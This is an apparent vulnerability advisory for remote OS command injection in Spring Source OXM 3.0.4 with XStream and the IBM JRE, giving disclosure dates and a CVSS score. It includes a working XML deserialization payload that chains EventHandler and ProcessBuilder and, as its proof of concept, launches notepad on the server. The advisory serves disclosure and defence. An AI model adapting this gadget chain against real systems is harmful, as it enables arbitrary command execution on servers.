Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used

[pierre.ernst () ca ibm com]

Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics

CVSS: 7.6
  AccessVector: Network
  AccessComplexity: High
  Authentication: None
  Confidentiality Impact: Complete
  Integrity Impact: Complete
  Availability Impact: Complete 

Details:

Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.

This is an example of legitimate input:

<bicycle>
  <name>unicycle</name>
  <id>123</id>
  <nbrWheels>1</nbrWheels>
  <nbrRiders>1</nbrRiders>
</bicycle>


This malicious input will execute the notepad application on the server and open the C:\Windows\win.ini file

<bicycle class="java.util.TreeSet">
   <no-comparator />
   <object />
    <dynamic-proxy>
       <interface>java.lang.Comparable</interface>
       <handler class="java.beans.EventHandler">
          <target class="java.lang.ProcessBuilder">
           <command>
             <string>notepad.exe</string>
             <string>c:\windows\win.ini</string>
           </command>
          </target>
          <action>start</action>
       </handler>
    </dynamic-proxy>
</bicycle>